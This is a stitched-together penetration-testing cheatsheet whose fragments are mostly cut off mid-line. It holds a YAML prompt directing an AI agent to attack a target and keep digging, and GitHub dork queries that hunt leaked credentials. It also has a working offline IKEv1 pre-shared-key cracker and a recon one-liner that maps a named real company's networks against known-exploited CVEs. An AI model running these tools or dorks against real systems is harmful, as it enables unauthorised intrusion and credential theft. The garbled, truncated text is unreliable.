```markdown
# External Penetration Testing Cheatsheet

## 1. Reconnaissance

### Cloud Enumeration

# Cloud Infrastructure Discovery
./cloud_enum.py -k somecompany

# Third Party Misconfigurations
```
```yaml
agent: >
  You are an expert penetration tester tasked with performing an external penetration test on a specified target (e.g., IP address or domain). Your goal is to identify vulnerabilities, propose exploitation methods, and deliver actionable findings with proof-of-concept details in `PENTEST.md`.

  ## Instructions
  - Target external assets specified via {{ target }} (e.g., public IPs, domains).
  - Follow a systematic yet creative methodology: reconnaissance, scanning, exploitation, and post-exploitation.
  - Use available data (e.g., provided outputs, hypothetical scan results) or execute commands to gather more as needed.
  - Identify confirmed vulnerabilities or exploitable weaknesses with evidence (e.g., tool outputs, HTTP responses).
  - Avoid stopping at "nothing found"—if initial scans (e.g., port scans) yield no results, dig deeper with alternative tools, techniques, or assumptions.
  - Prioritize high-impact vulnerabilities (e.g., remote code execution, privilege escalation, data exposure, aut
```
```bash
#!/bin/bash
#
# IKE PSK Hash Capture Tool
# Captures Pre-Shared Key hashes from IKEv1 VPNs with Aggressive Mode enabled
#
# Usage: ./ike_psk_capture.sh <target_ip> [group_name]
#
RED='\033[0;31m'
GREEN='\033[0;92m'
```
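Why a captured Aggressive Mode exchange is worth collecting: the responder's HASH_R travels in the clear, and RFC 2409 derives it from the PSK plus values the peer already knows (SKEYID = prf(PSK, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)), so the PSK can be tested offline against a wordlist. The script below is an added example of that offline check, not the gist's code. It assumes the colon-separated hex field order that ike-scan's `--pskcrack` output uses and psk-crack reads (check the man page of your ike-scan version), picks the PRF from the hash length the way psk-crack does (16 bytes MD5, 20 bytes SHA-1; other PRFs are left out), and the sample capture is constructed from a known PSK rather than taken from a real VPN.

```python
"""Offline IKEv1 Aggressive Mode PSK check (added example; constructed sample data)."""
import hashlib
import hmac

# Field order assumed from ike-scan's --pskcrack / psk-crack file format.
FIELD_NAMES = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")

# The negotiated PRF is recovered from the length of HASH_R, as psk-crack does.
PRF_BY_HASH_LEN = {16: "md5", 20: "sha1"}


def parse_capture_line(line):
    """Split one psk-crack style line into named byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELD_NAMES):
        raise ValueError(f"expected {len(FIELD_NAMES)} hex fields, got {len(parts)}")
    return dict(zip(FIELD_NAMES, (bytes.fromhex(p) for p in parts)))


def hash_r_for_psk(psk, cap, digest):
    """Recompute HASH_R for a candidate PSK from the captured public values (RFC 2409)."""
    def prf(key, data):
        return hmac.new(key, data, digest).digest()

    skeyid = prf(psk, cap["ni_b"] + cap["nr_b"])
    return prf(skeyid, cap["g_xr"] + cap["g_xi"] + cap["cky_r"] + cap["cky_i"]
               + cap["sai_b"] + cap["idir_b"])


def crack(line, candidates):
    """Return the first candidate that reproduces the captured HASH_R, or None."""
    cap = parse_capture_line(line)
    digest = PRF_BY_HASH_LEN.get(len(cap["hash_r"]))
    if digest is None:
        raise ValueError(f"unsupported HASH_R length {len(cap['hash_r'])}")
    for word in candidates:
        psk = word.encode() if isinstance(word, str) else word
        if hmac.compare_digest(hash_r_for_psk(psk, cap, digest), cap["hash_r"]):
            return psk.decode(errors="replace")
    return None


def build_capture_line(psk, fields, digest="sha1"):
    """Build a capture line for a known PSK; used only to make the constructed sample."""
    cap = dict(fields)
    cap["hash_r"] = hash_r_for_psk(psk, cap, digest)
    return ":".join(cap[name].hex() for name in FIELD_NAMES)


def _filler(label, n):
    # Deterministic filler bytes for the constructed sample (not real DH or nonce values).
    return (hashlib.sha256(label).digest() * (n // 32 + 1))[:n]


SAMPLE_FIELDS = {
    "g_xr": _filler(b"g_xr", 128),    # DH group 2 public values are 128 bytes
    "g_xi": _filler(b"g_xi", 128),
    "cky_r": _filler(b"cky_r", 8),    # ISAKMP cookies are 8 bytes
    "cky_i": _filler(b"cky_i", 8),
    "sai_b": _filler(b"sai_b", 40),   # initiator SA payload body
    "idir_b": _filler(b"idir_b", 12), # responder ID payload body
    "ni_b": _filler(b"ni_b", 20),
    "nr_b": _filler(b"nr_b", 20),
}
SAMPLE_PSK = "cisco123"  # constructed, for the sample only
SAMPLE_LINE = build_capture_line(SAMPLE_PSK.encode(), SAMPLE_FIELDS, "sha1")
WORDLIST = ["password", "vpn2019", "cisco123", "letmein"]

if __name__ == "__main__":
    print("recovered PSK:", crack(SAMPLE_LINE, WORDLIST))
```

Feed a real capture by replacing SAMPLE_LINE with a line from the psk-crack file the script above writes; a SHA-256 PRF (32-byte HASH_R) would need an entry in PRF_BY_HASH_LEN before this check accepts it.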
```bash
#!/bin/bash
# LinWinPwn Missing Tools Installer
# Installs all tools that linWinPwn checks for but doesn't install by default
# Run with sudo: sudo bash linwinpwn_missing_tools.sh
set -e
scripts_dir="/opt/lwp-scripts"
current_user="${SUDO_USER:-$(whoami)}"
```
```text
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
```
```text
0
1
11
12
13
14
15
16
17
2
```
```text
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
```
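The dorks above find files that assign these variable names; the next step is deciding which hits are real. The scanner below is an added example (not the gist's own code) that applies the same `NAME=` pattern to a checked-out file, drops placeholder and templated values, and ranks the rest by Shannon entropy so a real token sorts above `changeme`. The name list is a subset taken from the dorks, the placeholder set and the 3.0-bit entropy floor are assumptions to tune, and the `.env`-style input is constructed, not a real leak.

```python
"""Rank NAME=value secret assignments by entropy (added example; constructed input)."""
import math
import re

# Names taken from the dork list above; extend as needed.
SECRET_NAMES = [
    "BROWSERSTACK_ACCESS_KEY", "CHROME_CLIENT_SECRET", "CHROME_REFRESH_TOKEN",
    "CI_DEPLOY_PASSWORD", "CLOUDAMQP_URL", "CLOUDANT_PASSWORD",
    "CONTENTFUL_V2_ACCESS_TOKEN", "ELASTICSEARCH_PASSWORD",
]
# Assumed placeholder values that are never worth reporting (compared lower-cased).
PLACEHOLDERS = {"", "changeme", "xxx", "todo", "<secret>", "your-key-here"}

# NAME=value, optionally "export"ed, optionally quoted; a trailing "# comment" is dropped,
# which also truncates any unquoted value that itself contains "#".
ASSIGN_RE = re.compile(
    r"^\s*(?:export\s+)?(?P<name>" + "|".join(map(re.escape, SECRET_NAMES))
    + r")\s*=\s*(?P<value>.*?)\s*(?:#.*)?$"
)


def shannon_entropy(s):
    """Bits per character; 0.0 for empty or single-character strings."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def find_secrets(text, min_entropy=3.0):
    """Return matching assignments above the entropy floor, highest entropy first."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        value = m.group("value").strip().strip("'\"")
        # Skip placeholders and ${VAR}-style references to another variable.
        if value.lower() in PLACEHOLDERS or value.startswith("${"):
            continue
        ent = shannon_entropy(value)
        if ent >= min_entropy:
            hits.append({"line": lineno, "name": m.group("name"),
                         "entropy": round(ent, 2), "value": value})
    return sorted(hits, key=lambda h: h["entropy"], reverse=True)


# Constructed sample file, not a real leak.
SAMPLE_ENV = """\
CI_DEPLOY_USER=deploy
CI_DEPLOY_PASSWORD=changeme
export ELASTICSEARCH_PASSWORD="Qm3x9vT2kL8wPz4R"   # rotate me
CLOUDANT_PASSWORD=${CLOUDANT_PASSWORD}
CLOUDAMQP_URL=amqps://user:s3cr3tP4ssw0rdXYZ@host.cloudamqp.com/vhost
CONTENTFUL_V2_ACCESS_TOKEN=aaaaaaaaaaaaaaaa
"""

if __name__ == "__main__":
    for hit in find_secrets(SAMPLE_ENV):
        print(f"line {hit['line']}: {hit['name']} entropy={hit['entropy']}")
```

Entropy alone is a ranking signal, not proof: a base64 blob of public data scores as high as a key, so each hit still needs a manual look or a validity check against the service it belongs to.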
```yaml
id: sensitive-credential-files

info:
  name: Sensitive Credential File Discovery
  author: nullenc0de
  severity: high
  description: Discovers exposed files containing credentials, API keys, passwords, and other sensitive data
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
```
```bash
# Pull the CISA KEV catalogue and keep only the CVE IDs
curl -s https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json | jq -r '.vulnerabilities[].cveID' > cves.txt

# Subdomains -> resolved IPs -> owning CIDRs (dropping /8-/16 blocks) -> BGP prefixes from Team Cymru
# -> every IP in those prefixes -> Shodan InternetDB via nrich -> hosts whose CVEs appear in the KEV list
subfinder -d tesla.com -silent \
  | dnsx -silent -a -resp-only \
  | sort -u \
  | xargs -n1 -P 1500 -I% curl -s "http://networktools.nl/whois/%" \
  | grep "CIDR" | cut -d : -f2 | tr , "\n" | awk '{$1=$1};1' | sort -u \
  | egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" \
  | while read ip; do whois -h whois.cymru.com " -v $ip"; done \
  | grep -v "BGP Prefix" | cut -d '|' -f3 | awk '{$1=$1};1' | sort -u \
  | cidr2ip | sort -u \
  | nrich - \
  | grep -B4 -f cves.txt \
  | tee shodan.txt
slackcat --channel bugbounty --filename shodan.txt
```
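The final `grep -B4 -f cves.txt` treats every KEV ID as a substring pattern, so a short ID can match a longer one and the four lines of context may belong to the wrong host. The script below is an added example (not the gist's code) of the same KEV match done by exact CVE-ID set intersection per host. Both inputs are constructed: a two-entry stand-in for the KEV JSON, and an nrich-style report (IP line followed by indented Ports/CPEs/Vulnerabilities lines, which is the layout assumed here; adjust `parse_nrich` if your nrich version prints differently).

```python
"""Match nrich output against the CISA KEV list by exact CVE ID (added example; constructed data)."""
import json
import re

# Constructed stand-in for cisa.gov's known_exploited_vulnerabilities.json.
KEV_SAMPLE = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2"},
    {"cveID": "CVE-2014-0160", "vendorProject": "OpenSSL", "product": "OpenSSL"},
]})

# Constructed nrich-style report; the layout is an assumption about nrich's output.
NRICH_SAMPLE = """\
203.0.113.10 (vpn.example.test)
  Ports: 443, 500
  CPEs: cpe:/a:openssl:openssl
  Vulnerabilities: CVE-2014-0160, CVE-2021-3449
203.0.113.11 (www.example.test)
  Ports: 80, 443
  Vulnerabilities: CVE-2021-44790
203.0.113.12 (mail.example.test)
  Ports: 25
"""

IP_LINE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\b")  # host header lines start in column 0
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def kev_ids(kev_json):
    """Set of CVE IDs in a KEV catalogue document."""
    return {v["cveID"] for v in json.loads(kev_json)["vulnerabilities"]}


def parse_nrich(text):
    """Map each host IP to the set of CVE IDs nrich listed for it."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = IP_LINE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = set()
        elif current and line.strip().startswith("Vulnerabilities:"):
            hosts[current].update(CVE_RE.findall(line))
    return hosts


def hosts_with_kev(nrich_text, kev_json):
    """Hosts carrying at least one KEV-listed CVE, with the matching IDs sorted."""
    kev = kev_ids(kev_json)
    return {ip: sorted(cves & kev)
            for ip, cves in parse_nrich(nrich_text).items() if cves & kev}


if __name__ == "__main__":
    for ip, cves in hosts_with_kev(NRICH_SAMPLE, KEV_SAMPLE).items():
        print(ip, ", ".join(cves))
```

Pipe the real `nrich -` output into `parse_nrich` and the downloaded KEV file into `kev_ids` to reproduce the one-liner's last stage without the substring and context-window pitfalls of `grep -B4 -f`.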
```yaml
id: suspicious-extensions-rce

info:
  name: Suspicious File Extensions - Potential RCE
  author: Nullenc0de
  severity: medium
  description: Detects files with potentially suspicious extensions that could be used for Remote Code Execution (RCE). Scan your AppData folder.

file:
  - extensions:
```